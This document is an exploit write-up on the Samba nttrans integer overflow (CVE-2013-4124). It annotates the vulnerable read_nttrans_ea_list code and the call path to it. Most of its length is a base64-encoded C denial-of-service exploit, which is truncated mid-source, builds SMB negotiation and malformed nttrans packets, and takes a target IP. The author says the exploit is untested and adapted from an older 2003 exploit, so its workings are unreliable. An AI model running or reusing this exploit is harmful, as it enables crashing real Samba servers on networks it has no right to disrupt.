Exploitation: samba nttrans reply integer overflow ___ ___ / _ \ / _ \ __ __| (_) || | | | ___ \ \/ / \__. || | | | / __| > < / / | |_| || (__ /_/\_\ /_/ \___/ \___| [toc] ----[ 1 - Intro ----[ 2 - vulnerable versions ----[ 3 - call graph ----[ 4 - security bug analyze ----[ 5 - exploitability ----[ 6 - conclusion ----[ 7 - codes ----[ 1 - Intro CVE-2013-4124 samba integer overflow in nttrans reply reading ea_list vulnerable samba daemon has a integer overflow to cause remote dos by nttrans reply while the daemon reading ea_list. In the detail, unsigned data type offset variable in vulnerable function of read_nttrans_ea_list can be wrap up! security bug! x90c ----[ 2 - vulnerable versions - samba 3.5.22 <= - samba 3.6.17 <= - samba 4.0.8 <= ----[ 3 - call graph +reply_nttrans // reply nttrans +->handle_nttrans +-> call_nt_transact_create // transact! -> read_nttrns_ea_list(vulnerable function) ----[ 4 - security bug analyze smbd/nttrans.c ---- snip ---- snip ---- snip ---- snip ---- 971 /**************************************************************************** 972 Read a list of EA names and data from an incoming data buffer. Create an ea_list with them. 973 ****************************************************************************/ 974 EA names, data from samba incoming buffer! 975 struct ea_list *read_nttrans_ea_list(TALLOC_CTX *ctx, const char *pdata, size_t data_size) // *pdata is inject vector 976 { 977 struct ea_list *ea_list_head = NULL; 978 size_t offset = 0; // unisigned 979 980 if (data_size < 4) { 981 return NULL; 982 } 983 984 while (offset + 4 <= data_size) { // XXX (3) if offset is wrap up then it enters the loop continuly 985 size_t next_offset = IVAL(pdata,offset); // unsigned XXX (1) if next_offset from pdata pointer is much large value then to lead integer wrap! // XXX (4) may memory corruption point! if offset is wrap up then second argv pointer(pdata+offset+4) pointers around zero memory then smb dos! 986 struct ea_list *eal = read_ea_list_entry(ctx, pdata + offset + 4, data_size - offset - 4, NULL); 987 988 if (!eal) { 989 return NULL; 990 } 991 992 DLIST_ADD_END(ea_list_head, eal, struct ea_list *); 993 if (next_offset == 0) { 994 break; 995 } 996 997 /* Integer wrap protection for the increment. */ // XXX patch code 998 if (offset + next_offset < offset) { 999 break; 1000 } 1001 1002 offset += next_offset; // XXX (2) if next_offset is large value then offset is wrap! 1003 1004 /* Integer wrap protection for while loop. */ // XXX patch code 1005 if (offset + 4 < offset) { 1006 break; 1007 } 1008 1009 } 1010 1011 return ea_list_head; 1012 } ---- snip ---- snip ---- snip ---- snip ---- ---- snip ---- snip ---- snip ---- snip ---- 1014 /**************************************************************************** 1015 Reply to a NT_TRANSACT_CREATE call (needs to process SD's). 1016 ****************************************************************************/ 1017 1018 static void call_nt_transact_create(connection_struct *conn, 1019 struct smb_request *req, 1020 uint16 **ppsetup, uint32 setup_count, 1021 char **ppparams, uint32 parameter_count, 1022 char **ppdata, uint32 data_count, 1023 uint32 max_data_count) 1024 { ... 1148 /* We have already checked that ea_len <= data_count here. */ 1149 ea_list = read_nttrans_ea_list(talloc_tos(), data + sd_len, 1150 ea_len); ---- snip ---- snip ---- snip ---- snip ---- ---- snip ---- snip ---- snip ---- snip ---- 2639 static void handle_nttrans(connection_struct *conn, 2640 struct trans_state *state, 2641 struct smb_request *req) 2642 { ... 2651 /* Now we must call the relevant NT_TRANS function */ 2652 switch(state->call) { 2653 case NT_TRANSACT_CREATE: // NT_TRANSACT_CREATE! 2654 { 2655 START_PROFILE(NT_transact_create); 2656 call_nt_transact_create( 2657 conn, req, 2658 &state->setup, state->setup_count, 2659 &state->param, state->total_param, 2660 &state->data, state->total_data, 2661 state->max_data_return); 2662 END_PROFILE(NT_transact_create); 2663 break; 2664 } ---- snip ---- snip ---- snip ---- snip ---- ---- snip ---- snip ---- snip ---- snip ---- 2770 /**************************************************************************** 2771 Reply to a SMBNTtrans. 2772 ****************************************************************************/ 2773 2774 void reply_nttrans(struct smb_request *req) // smb_request! 2775 { ... 2945 if ((state->received_data == state->total_data) && 2946 (state->received_param == state->total_param)) { 2947 handle_nttrans(conn, state, req); ---- snip ---- snip ---- snip ---- snip ---- ----[ 5 - exploitability * keywords: - samba incoming data - EA names - data - 0xf1000000 - SMB NTTRANS - Samba reply_nttrans() Remote Root Exploit (http://www.securiteam.com/exploits/5TP0M2AAKS.html) - SMB_COM_NT_TRANSACT(0xa0) = NTtrans (32-bit field) - SMBtrans - http://ubiqx.org/cifs/SMB.html ----[ 6 - conclusion The security bug is remote dos to a daemon, the impact is exist even though it's exploited on local network. If large local network exist and many samba on the network, security risk is exist. I assign the dos impact to medium, and the apache or wuftpd dos to high because they are can be exploited on internet the samba dos exploit will be reliable! ----[ 7 - codes begin 644 samba_nttrans_exploit.c (base64) LyoNCg0KICAgICEhISEhIFBSSVZBVEUgISEhISEgUFJJVkFURS AhISEhISBQUklWQVRFICEhISEhIFBSSVZBVEUgISEhISENCg0K CUNWRS0yMDEzLTQxMjQgc2FtYmEgZG9zIGV4cGxvaXQNCg0KCS 0tLS0NCglbeDkwY0B1YnVudHUgc2FtYmFfZG9zXSQgLi9zYW1i YV9udHRyYW5zX2V4cGxvaXQNCiAgICAgICAgICAgICAgICAgIC AgICAgICAgICAgICAgICAgIF9fXyAgICBfX18NCiAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgLyBfIFwgIC8gXy BcDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgX18gIF9f fCAoXykgfHwgfCB8IHwgIF9fXw0KICAgICAgICAgICAgICAgIC AgICAgICAgICAgIFwgXC8gLyBcX18uIHx8IHwgfCB8IC8gX198 DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgID4gIDwgIC AgLyAvIHwgfF98IHx8IChfXw0KICAgICAgICAgICAgICAgICAg ICAgICAgICAgIC9fL1xfXCAgL18vICAgXF9fXy8gIFxfX198DQ oNCg0KCXNhbWJhIG50dHJhbnMgcmVwbHkgZXhwbG9pdA0KDQoJ c2FtYmEgbnR0cmFucyByZXBseSBleHBsb2l0IFVzYWdlOg0KDQ oJLi9zYW1iYV9leHBsb2l0IFt0YXJnZXQgaXAgYWRkcl0gPHNl cnZlciBuYW1lPg0KDQoJZXgpIC4vc2FtYmFfZXhwbG9pdCAxMC 4wLjEuMTYNCglleCkgLi9zYW1iYV9leHBsb2l0IDEwLjAuMS4x NiBNWVNBTUJBDQoNCglbeDkwY0B1YnVudHUgc2FtYmFfZG9zXS QNCgktLS0tDQoNCiAgICAgKiAuLi4gRGVzY3JpcHRpb24gLi4u Og0KICAgICAgSSBkaWRuJ3QgdGVzdCBmb3IgdGhlIGV4cGxvaX QgeWV0LCBJIA0KICAgICAgY29waWVkIGFub3RoZXIgc2FtYmEg bnR0cmFucyBleHBsb2l0IA0KICAgICAgaW4gMjAwMyB0aGF0IG h0dHA6Ly93d3cuc2VjdXJpdGVhbS5jbw0KICAgICAgbS9leHBs b2l0cy81VFAwTTJBQUtTLmh0bWwuIDEpIHRoZSB2dWwNCiAgIC AgIG5lcmFibGUgZGF0YSBvZmZzZXQgaXMgYXV0b21hdGVkIGZy b20gDQogICAgICAweGZmZmZmZmZmIHRvIDB4ZjEwMDAwMDAgYW 5kIGNhbiBwYXNzIA0KICAgICAgc2Vjb25kIGFyZ3VtZW50IGZv ciBzZXJ2ZXIgbmFtZSB0byBtYWtlIA0KICAgICAgbmJ0IHNlc3 Npb24gSWYgcGFzcyB0YXJnZXQgaXAgYWRkciANCiAgICAgIGFu ZCBzZXJ2ZXIgbmFtZSB0byB0aGlzIGV4cGxvaXQgdGhlIA0KIC AgICAgc2FtYmEgd2lsbCBiZSBkb3MhDQogICAgICANCiAgICAg IHRoZSBleHBsb2l0IHNlbmQgbWFsZm9ybWVkIG50dHJhbnMgDQ ogICAgICBzbWIgcGFja2V0IHdpdGggbGFyZ2UgdmFsdWUgb2Yg ZGF0YSANCiAgICAgIG9mZnNldCBhbmQgcGFyYW0gb2Zmc2V0ID IpIHRoZXkgYXJlIGFsbCANCiAgICAgIG9mIG9mZnNldCBvZiBu dHRyYW5zIHN0cnVjdCB0byBjYXVzZSANCiAgICAgIGludGVnZX Igd3JhcCBpbiB0aGUgdnVsbmVyYWJsZSBmdW5jdGlvbiANCiAg ICAgIG9mIHJlYWRfbnR0cm5zX2VhX2xpc3QNCg0KICAgICAgSX Qgc2hvdWxkIGJlIHdvcmtzIGJlY2F1c2UgMSkgMikNCg0KICAg ICAgLSBleHBsb2l0IHByb2Nlc3M6DQogICAgICAgICAgKDEpIH NtYiBuZWdvdGlhdGlvbnMNCiAgICAgICAgICAoMikgbWFsZm9y bWVkIHNtYiBudHRyYW5zIHBhY2tldCB3aXRoaW4NCiAgICAgIC AgICAgICAgb2Zmc2V0IDB4ZmZmZmZmZmYgfiAweGYxMDAwMDAw IHRvDQogICAgICAgICAgICAgIGludGVnZXIgd3JhcCBzZW50IQ 0KICAgICAgICAgICgzKSAuLi4uLi4gc2FtYmEgZG9zIQ0KDQog ICAgICBJIGxlZnQgYW4gYXJ0aWNsZSB0aGF0IGFuYWx5emVkIG l0DQogICAgDQogICAgISEhISEgUFJJVkFURSAhISEhISBQUklW QVRFICEhISEhIFBSSVZBVEUgISEhISEgUFJJVkFURSAhISEhIQ 0KDQoNCgl4OTBjDQoNCiovDQoNCiNpbmNsdWRlIDxzeXMvc29j a2V0Lmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPg0KI2luY2 x1ZGUgPGFycGEvaW5ldC5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+ DQojaW5jbHVkZSA8ZXJybm8uaD4NCiNpbmNsdWRlIDxzdHJpbm cuaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHVu aXN0ZC5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZG UgPGN0eXBlLmg+DQojaW5jbHVkZSA8c2lnbmFsLmg+DQoNCnR5 cGVkZWYgdW5zaWduZWQgY2hhciB1aW50ODsNCnR5cGVkZWYgdW 5zaWduZWQgc2hvcnQgdWludDE2Ow0KdHlwZWRlZiB1bnNpZ25l ZCBsb25nIHVpbnQzMjsNCg0Kc3RydWN0IHZhcmlhYmxlX2RhdG FfaGVhZGVyDQp7IHVpbnQ4IHdvcmRjb3VudCwgYnl0ZWNvdW50 WzJdOw0KfTsNCg0Kc3RydWN0IG5idF9zZXNzaW9uX2hlYWRlcg 0KeyB1aW50OCB0eXBlLCBmbGFncywgbGVuWzJdOw0KfTsNCg0K c3RydWN0IHNtYl9iYXNlX2hlYWRlcg0KeyB1aW50OCBwcm90b2 NvbFs0XSwgY29tbWFuZCwgZXJyb3JjbGFzcywgcmVzZXJ2ZWQs IGVycm9yY29kZVsyXTsNCiB1aW50OCBmbGFnczsNCiB1aW50OC BmbGFnczJbMl0sIHJlc2VydmVkMlsxMl0sIHRpZFsyXSwgcGlk WzJdLCB1aWRbMl0sIG1pZFsyXTsNCn07DQoNCnN0cnVjdCBuZW dwcm90X3JlcGx5X2hlYWRlcg0KeyB1aW50OCB3b3JkY291bnQ7 DQogdWludDggZGlhbGVjdGluZGV4WzJdOw0KIHVpbnQ4IHNlY3 VyaXR5bW9kZTsNCiB1aW50MTYgbWF4bXB4Y291bnQsIG1heHZj Y291bnQ7DQogdWludDMyIG1heGJ1ZnNpemUsIG1heHJhd3Npem UsIHNlc3Npb25pZCwgY2FwYWJpbGl0aWVzLCB0aW1lbG93LCB0 aW1laGlnaDsNCiB1aW50MTYgdGltZXpvbmU7DQogdWludDgga2 V5bGVuOw0KIHVpbnQxNiBieXRlY291bnQ7DQp9Ow0KDQpzdHJ1 Y3Qgc2Vzc3NldHVweF9yZXF1ZXN0X2hlYWRlcg0KeyB1aW50OC B3b3JkY291bnQsIGNvbW1hbmQsIHJlc2VydmVkOw0KIHVpbnQ4 IG9mZnNldFsyXSwgbWF4YnVmc2l6ZVsyXSwgbWF4bXB4Y291bn RbMl0sIHZjbnVtYmVyWzJdOw0KIHVpbnQ4IHNlc3Npb25pZFs0 XTsNCiB1aW50OCBpcGFzc3dkbGVuWzJdLCBwYXNzd2RsZW5bMl 07DQogdWludDggcmVzZXJ2ZWQyWzRdLCBjYXBhYmlsaXRpZXNb NF07DQp9Ow0KDQpzdHJ1Y3Qgc2Vzc3NldHVweF9yZXBseV9oZW FkZXINCnsgdWludDggd29yZGNvdW50LCB4Y29tbWFuZCwgeHJl c2VydmVkLCB4b2Zmc2V0WzJdLCBhY3Rpb25bMl0sIGJ5dGVjb3 VudFsyXTsNCn07DQoNCnN0cnVjdCB0Y29ueF9yZXF1ZXN0X2hl YWRlcg0KeyB1aW50OCB3b3JkY291bnQsIHhjb21tYW5kLCB4cm VzZXJ2ZWQsIHhvZmZzZXRbMl0sIGZsYWdzWzJdLCBwYXNzd2Rs ZW5bMl0sIGJ5dGVjb3VudFsyXTsNCn07DQoNCnN0cnVjdCB0Y2 9ueF9yZXBseV9oZWFkZXINCnsgdWludDggd29yZGNvdW50LCB4 Y29tbWFuZCwgeHJlc2VydmVkLCB4b2Zmc2V0WzJdLCBzdXBwb3 J0Yml0c1syXSwgYnl0ZWNvdW50WzJdOw0KfTsNCg0Kc3RydWN0 IG50dHJhbnNfcmVxdWVzdF9oZWFkZXINCnsgDQoJdWludDggd2 9yZGNvdW50OyANCgl1aW50OCBtYXhzZXR1cGNvdW50OyANCgl1 aW50OCBmbGFnc1syXTsNCgl1aW50OCB0b3RhbHBhcmFtY291bn RbNF07IA0KCXVpbnQ4IHRvdGFsZGF0YWNvdW50WzRdOw0KCXVp bnQ4IG1heHBhcmFtY291bnRbNF07DQoJdWludDggbWF4ZGF0YW NvdW50WzRdOw0KICAgIHVpbnQ4IHBhcmFtY291bnRbNF07DQoJ dWludDggcGFyYW1vZmZzZXRbNF07CS8vIG9mZnNldCENCgl1aW 50OCBkYXRhY291bnRbNF07DQoJdWludDggZGF0YW9mZnNldFs0 XTsJLy8gWFhYIHRoZSBkYXRhIG9mZnNldCB2dWxuZXJhYmxlIQ 0KCXVpbnQ4IHNldHVwY291bnQ7CQkvLyAgICAgbnR0cmFucyBz dHJ1Y3QgZG9lc24ndCBoYXZlIG90aGVyIG9mZnNldCANCgl1aW 50OCBmdW5jdGlvblsyXTsJCS8vICAgICBmaWVsZCB3aXRob3V0 IHRoZW0NCgl1aW50OCBieXRlY291bnRbMl07DQp9Ow0KDQojZG VmaW5lIFNNQl9ORUdQUk9UIDB4NzINCiNkZWZpbmUgU01CX1NF U1NTRVRVUFggMHg3Mw0KI2RlZmluZSBTTUJfVENPTlggMHg3NQ 0KI2RlZmluZSBTTUJfVFJBTlMyIDB4MzINCiNkZWZpbmUgU01C X05UVFJBTlMgMHhBMA0KI2RlZmluZSBTTUJfTlRUUkFOU0NSRU FURSAweDAxDQojZGVmaW5lIFNNQl9UUkFOUzJPUEVOIDB4MDAN CiNkZWZpbmUgU01CX1NFU1NJT05SRVEgMHg4MQ0KI2RlZmluZS BTTUJfU0VTU0lPTiAweDAwDQoNCnVpbnQzMiBzZXNzaW9uaWQs IFBBUkFNQkFTRSA9IDB4ODFjMDAwMDsNCmNoYXIgKnRjb254X3 NlcnZlcm5hbWU7DQppbnQgdGlkLCBwaWQsIHVpZDsNCg0KI2Rl ZmluZSBTVEFDS0JPVFRPTSAweGJmZmZmZmZmDQojZGVmaW5lIF NUQUNLQkFTRSAweGJmZmZkMDAwDQojZGVmaW5lIFRPVEFMQ09V TlQgKChpbnQpKFNUQUNLQk9UVE9NIC0gU1RBQ0tCQVNFKSkNCg 0KY2hhciAqbmV0Ymlvc19lbmNvZGVfbmFtZShjaGFyICpuYW1l LCBpbnQgdHlwZSkNCnsgY2hhciBwbGFpbm5hbWVbMTZdLCBjLC AqZW5jb2RlZCwgKnB0cjsNCiBpbnQgaSwgbGVuID0gc3RybGVu KG5hbWUpOw0KIGlmICgoZW5jb2RlZCA9IG1hbGxvYygzNCkpID 09IE5VTEwpDQogeyBmcHJpbnRmKHN0ZGVyciwgIm1hbGxvYygp IGZhaWxlZFxuIik7DQogZXhpdCgtMSk7DQogfQ0KIHB0ciA9IG VuY29kZWQ7DQogc3RybmNweShwbGFpbm5hbWUsIG5hbWUsIDE1 KTsNCiAqcHRyKysgPSAweDIwOw0KIGZvciAoaSA9IDA7IGkgPC AxNjsgaSsrKQ0KIHsgaWYgKGkgPT0gMTUpIGMgPSB0eXBlOw0K IGVsc2UgDQogeyBpZiAoaSA8IGxlbikgYyA9IHRvdXBwZXIocG xhaW5uYW1lW2ldKTsNCiAgZWxzZSBjID0gMHgyMDsNCiB9DQog KnB0cisrID0gKCgoYyA+PiA0KSAmIDB4ZikgKyAweDQxKTsNCi AqcHRyKysgPSAoKGMgJiAweGYpICsgMHg0MSk7DQogfQ0KICpw dHIgPSAnXDAnOw0KIHJldHVybiBlbmNvZGVkOw0KfQ0KDQp2b2 lkIGNvbnN0cnVjdF9uYnRfc2Vzc2lvbl9oZWFkZXIoY2hhciAq cHRyLCB1aW50OCB0eXBlLCB1aW50OCBmbGFncywgdWludDMyIG xlbikNCnsgc3RydWN0IG5idF9zZXNzaW9uX2hlYWRlciAqbmJ0 X2hkciA9IChzdHJ1Y3QgbmJ0X3Nlc3Npb25faGVhZGVyICopcH RyOw0KIHVpbnQxNiBubGVuOw0KDQovLyBnZWVuIGlkZWUgb2Yg ZGl0IGRlIGp1aXN0ZSBtYW5pZXIgaXMsIG1hYXIgJ3QgbGlqa3 Qgd2VsIHRlIHdlcmtlbiAuLg0KIGlmIChsZW4gPiA2NTUzNSkg bmxlbiA9IDY1NTM1Ow0KIGVsc2UgbmxlbiA9IGh0b25zKGxlbi k7DQoNCiBtZW1zZXQoKHZvaWQgKiluYnRfaGRyLCAnXDAnLCBz aXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIpKTsNCi ANCiBuYnRfaGRyLT50eXBlID0gdHlwZTsNCiBuYnRfaGRyLT5m bGFncyA9IGZsYWdzOw0KIG1lbWNweSgmbmJ0X2hkci0+bGVuLC Ambmxlbiwgc2l6ZW9mICh1aW50MTYpKTsNCn0NCg0KLy8gY2Fs bGVyIHpvcmd0IHZvb3IganVpc3RlIHdhYXJkZSB2YW4gcHRyLg 0Kdm9pZCBjb25zdHJ1Y3Rfc21iX2Jhc2VfaGVhZGVyKGNoYXIg KnB0ciwgdWludDggY29tbWFuZCwgdWludDggZmxhZ3MsIHVpbn QxNiBmbGFnczIsIHVpbnQxNiB0aWQsIHVpbnQxNiBwaWQsIA0K IHVpbnQxNiB1aWQsIHVpbnQxNiBtaWQpDQp7IHN0cnVjdCBzbW JfYmFzZV9oZWFkZXIgKmJhc2VfaGRyID0gKHN0cnVjdCBzbWJf YmFzZV9oZWFkZXIgKilwdHI7DQoNCiBtZW1zZXQoYmFzZV9oZH IsICdcMCcsIHNpemVvZiAoc3RydWN0IHNtYl9iYXNlX2hlYWRl cikpOw0KDQogbWVtY3B5KGJhc2VfaGRyLT5wcm90b2NvbCwgIl x4ZmZTTUIiLCA0KTsNCg0KIGJhc2VfaGRyLT5jb21tYW5kID0g Y29tbWFuZDsNCiBiYXNlX2hkci0+ZmxhZ3MgPSBmbGFnczsNCg 0KIG1lbWNweSgmYmFzZV9oZHItPmZsYWdzMiwgJmZsYWdzMiwg c2l6ZW9mICh1aW50MTYpKTsNCiBtZW1jcHkoJmJhc2VfaGRyLT 50aWQsICZ0aWQsIHNpemVvZiAodWludDE2KSk7DQogbWVtY3B5 KCZiYXNlX2hkci0+cGlkLCAmcGlkLCBzaXplb2YgKHVpbnQxNi kpOw0KIG1lbWNweSgmYmFzZV9oZHItPnVpZCwgJnVpZCwgc2l6 ZW9mICh1aW50MTYpKTsNCiBtZW1jcHkoYmFzZV9oZHItPm1pZC wgJm1pZCwgc2l6ZW9mICh1aW50MTYpKTsNCn0NCg0Kdm9pZCBj b25zdHJ1Y3Rfc2Vzc3NldHVweF9oZWFkZXIoY2hhciAqcHRyKQ 0KeyBzdHJ1Y3Qgc2Vzc3NldHVweF9yZXF1ZXN0X2hlYWRlciAq c3hfaGRyID0gKHN0cnVjdCBzZXNzc2V0dXB4X3JlcXVlc3RfaG VhZGVyICopcHRyOw0KIHVpbnQxNiBtYXhidWZzaXplID0gMHhm ZmZmLCBtYXhtcHhjb3VudCA9IDIsIHZjbnVtYmVyID0gMzEyNT csIHB3ZGxlbiA9IDA7DQogdWludDMyIGNhcGFiaWxpdGllcyA9 IDB4NTA7DQoNCiBtZW1zZXQoc3hfaGRyLCAnXDAnLCBzaXplb2 YgKHN0cnVjdCBzZXNzc2V0dXB4X3JlcXVlc3RfaGVhZGVyKSk7 DQoNCiBzeF9oZHItPndvcmRjb3VudCA9IDEzOw0KIHN4X2hkci 0+Y29tbWFuZCA9IDB4ZmY7DQogbWVtY3B5KCZzeF9oZHItPm1h eGJ1ZnNpemUsICZtYXhidWZzaXplLCBzaXplb2YgKHVpbnQxNi kpOw0KIG1lbWNweSgmc3hfaGRyLT52Y251bWJlciwgJnZjbnVt YmVyLCBzaXplb2YgKHVpbnQxNikpOw0KIG1lbWNweSgmc3hfaG RyLT5tYXhtcHhjb3VudCwgJm1heG1weGNvdW50LCBzaXplb2Yg KHVpbnQxNikpOw0KIG1lbWNweSgmc3hfaGRyLT5zZXNzaW9uaW QsICZzZXNzaW9uaWQsIHNpemVvZiAodWludDMyKSk7DQogbWVt Y3B5KCZzeF9oZHItPmlwYXNzd2RsZW4sICZwd2RsZW4sIHNpem VvZiAodWludDE2KSk7DQogbWVtY3B5KCZzeF9oZHItPnBhc3N3 ZGxlbiwgJnB3ZGxlbiwgc2l6ZW9mICh1aW50MTYpKTsNCiBtZW 1jcHkoJnN4X2hkci0+Y2FwYWJpbGl0aWVzLCAmY2FwYWJpbGl0 aWVzLCBzaXplb2YgKHVpbnQzMikpOw0KfQ0KDQovKg0Kc3RydW N0IHRjb254X3JlcXVlc3RfaGVhZGVyDQp7IHVpbnQ4IHdvcmRj b3VudCwgeGNvbW1hbmQsIHhyZXNlcnZlZCwgeG9mZnNldFsyXS wgZmxhZ3NbMl0sIHBhc3N3ZGxlblsyXSwgYnl0ZWNvdW50WzJd Ow0KIC0tIHVpbnQxNiBieXRlY291bnQgZ2VlZnQgbGVuZ3RlIH ZhbiB2b2xnZW5kZSBmaWVsZHMgYWFuOiBjaGFyIHBhc3N3b3Jk W10sIHBhdGhbXSwgc2VydmljZVtdOw0KfTsgKi8NCnZvaWQgY2 9uc3RydWN0X3Rjb254X2hlYWRlcihjaGFyICpwdHIpDQp7IHN0 cnVjdCB0Y29ueF9yZXF1ZXN0X2hlYWRlciAqdHhfaGRyID0gKH N0cnVjdCB0Y29ueF9yZXF1ZXN0X2hlYWRlciAqKXB0cjsNCiB1 aW50MTYgcGFzc3dkbGVuID0gMSwgYnl0ZWNvdW50Ow0KIGNoYX IgKmRhdGE7DQoNCiBtZW1zZXQodHhfaGRyLCAnXDAnLCBzaXpl b2YgKHN0cnVjdCB0Y29ueF9yZXF1ZXN0X2hlYWRlcikpOw0KDQ ogYnl0ZWNvdW50ID0gc3RybGVuKHRjb254X3NlcnZlcm5hbWUp ICsgMTU7IA0KDQogaWYgKChkYXRhID0gbWFsbG9jKGJ5dGVjb3 VudCkpID09IE5VTEwpDQogeyBmcHJpbnRmKHN0ZGVyciwgIm1h bGxvYygpIGZhaWxlZCwgYWJvcnRpbmchXG4iKTsNCiBleGl0KC 0xKTsNCiB9DQogbWVtY3B5KGRhdGEsICJceDAwXHg1Y1x4NWMi LCAzKTsNCiBtZW1jcHkoZGF0YSArIDMsIHRjb254X3NlcnZlcm 5hbWUsIHN0cmxlbih0Y29ueF9zZXJ2ZXJuYW1lKSk7DQogbWVt Y3B5KGRhdGEgKyAzICsgc3RybGVuKHRjb254X3NlcnZlcm5hbW UpLCAiXHg1Y0lQQ1x4MjRceDAwXHgzZlx4M2ZceDNmXHgzZlx4 M2ZceDAwIiwgMTIpOw0KDQogdHhfaGRyLT53b3JkY291bnQgPS A0Ow0KIHR4X2hkci0+eGNvbW1hbmQgPSAweGZmOw0KDQogbWVt Y3B5KCZ0eF9oZHItPnBhc3N3ZGxlbiwgJnBhc3N3ZGxlbiwgc2 l6ZW9mICh1aW50MTYpKTsNCiBtZW1jcHkoJnR4X2hkci0+Ynl0 ZWNvdW50LCAmYnl0ZWNvdW50LCBzaXplb2YgKHVpbnQxNikpOw 0KDQogbWVtY3B5KHB0ciArIHNpemVvZiAoc3RydWN0IHRjb254 X3JlcXVlc3RfaGVhZGVyKSwgZGF0YSwgYnl0ZWNvdW50KTsNCn 0NCg0Kdm9pZCBuYnRfc2Vzc2lvbl9yZXF1ZXN0KGludCBmZCwg Y2hhciAqY2xpZW50bmFtZSwgY2hhciAqc2VydmVybmFtZSkNCn sgDQoJY2hhciAqY24sICpzbjsNCgljaGFyIHBhY2tldFtzaXpl b2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZWFkZXIpICsgKDM0IC ogMildOw0KDQoJY29uc3RydWN0X25idF9zZXNzaW9uX2hlYWRl cihwYWNrZXQsIFNNQl9TRVNTSU9OUkVRLCAwLCBzaXplb2YgKH BhY2tldCkgLSBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9o ZWFkZXIpKTsNCg0KCXRjb254X3NlcnZlcm5hbWUgPSBzZXJ2ZX JuYW1lOw0KDQoJc24gPSBuZXRiaW9zX2VuY29kZV9uYW1lKHNl cnZlcm5hbWUsIDB4MjApOw0KCWNuID0gbmV0Ymlvc19lbmNvZG VfbmFtZShjbGllbnRuYW1lLCAweDAwKTsNCg0KCW1lbWNweShw YWNrZXQgKyBzaXplb2YgKHN0cnVjdCBuYnRfc2Vzc2lvbl9oZW FkZXIpLCBzbiwgMzQpOw0KCW1lbWNweShwYWNrZXQgKyAoc2l6 ZW9mIChzdHJ1Y3QgbmJ0X3Nlc3Npb25faGVhZGVyKSArIDM0KS wgY24sIDM0KTsNCg0KCXdyaXRlKGZkLCBwYWNrZXQsIHNpemVv ZiAocGFja2V0KSk7DQoJY2xvc2UoZmQpOw0KDQoJZnJlZShjbi k7DQoJZnJlZShzbik7DQp9DQoNCnZvaWQgcHJvY2Vzc19uYnRf c2Vzc2lvbl9yZXBseShpbnQgZmQpDQp7IHN0cnVjdCBuYnRfc2 Vzc2lvbl9oZWFkZXIgbmJ0X2hkcjsNCiBjaGFyICplcnJvcm1z ZzsNCiB1aW50OCBlcnJvcmNvZGU7DQogaW50IHNpemUsIGxlbi A9IDA7DQoNCiBpZiAoKHNpemUgPSByZWFkKGZkLCAmbmJ0X2hk ciwgc2l6ZW9mIChuYnRfaGRyKSkpID09IC0xKQ0KIHsgY2xvc2 UoZmQpOw0KIGZwcmludGYoc3RkZXJyLCAicmVhZCgpIGZhaWxl ZCwgcmVhc29uOiAnJXMnIChjb2RlICVpKVxuIiwgc3RyZXJyb3 IoZXJybm8pLCBlcnJubyk7IA0KIGV4aXQoLWVycm5vKTsNCiB9 DQogaWYgKHNpemUgIT0gc2l6ZW9mIChuYnRfaGRyKSkNCiB7IG Nsb3NlKGZkKTsNCiBmcHJpbnRmKHN0ZGVyciwgInJlYWQoKSBh IGJyb2tlbiBwYWNrZXQsIGFib3J0aW5nLlxuIik7IA0KIGV4aX QoLTEpOw0KIH0NCiBtZW1jcHkoJmxlbiwgJm5idF9oZHIubGVu LCBzaXplb2YgKHVpbnQxNikpOw0KDQogaWYgKGxlbikNCiB7IH JlYWQoZmQsICh2b2lkICopJmVycm9yY29kZSwgMSk7IA0KIGNs b3NlKGZkKTsNCiBzd2l0Y2ggKGVycm9yY29kZSkNCiB7IGNhc2 UgMHg4MCA6IGVycm9ybXNnID0gIk5vdCBsaXN0ZW5pbmcgb24g Y2FsbGVkIG5hbWUiOyBicmVhazsNCiAgY2FzZSAweDgxIDogZX Jyb3Jtc2cgPSAiTm90IGxpc3RlbmluZyBmb3IgY2FsbGluZyBu YW1lIjsgYnJlYWs7DQogIGNhc2UgMHg4MiA6IGVycm9ybXNnID 0gIkNhbGxlZCBuYW1lIG5vdCBwcmVzZW50IjsgYnJlYWs7DQog IGNhc2UgMHg4MyA6IGVycm9ybXNnID0gIkNhbGxlZCBuYW1lIH ByZXNlbnQsIGJ1dCBpbnN1ZmZpY2llbnQgcmVzb3VyY2VzIjsg YnJlYWs7DQogIGNhc2UgMHg4ZiA6IGVycm9ybXNnID0gIlVuc3 BlY2lmaWVkIGVycm9yIjsgYnJlYWs7DQogIGRlZmF1bHQgOiBl cnJvcm1zZyA9ICJVbnNwZWNpZmllZCBlcnJvciAodW5rbm93bi BlcnJvciBjb2RlIHJlY2VpdmVkISkiOyBicmVhazsNCiB9DQog ZnByaW50ZihzdGRlcnIsICJzZXNzaW9uIHJlcXVlc3QgZGVuaW VkLCByZWFzb246ICclcycgKGNvZGUgJWkpXG4iLCBlcnJvcm1z ZywgZXJyb3Jjb2RlKTsNCiBleGl0KC0xKTsNCiB9DQogcHJpbn RmKCJzZXNzaW9uIHJlcXVlc3QgZ3JhbnRlZFxuIik7DQp9DQoN CnZvaWQgbmVncHJvdF9yZXF1ZXN0KGludCBmZCkNCnsgc3RydW N0IHZhcmlhYmxlX2RhdGFfaGVhZGVyIGRhdGE7DQogY2hhciBk aWFsZWN0c1tdID0gIlx4MlBDIE5FVFdPUksgUFJPR1JBTSAxLj BceDBceDJNSUNST1NPRlQgTkVUV09SS1MgMS4wM1x4MFx4Mk1J Q1JPU09GVCBORVRXT1JLUyAzLjBceDBceDJMQU5NQU4xLjBceD AiIFwNCiAiXHgyTE0xLjJYMDAyXHgwXHgyU2FtYmFceDBceDJO VCBMQU5NQU4gMS4wXHgwXHgyTlQgTE0gMC4xMlx4MFx4MiIiRk xBVExJTkUnUyBLV0FBRFdBQVIiOyANCiBjaGFyIHBhY2tldFtz 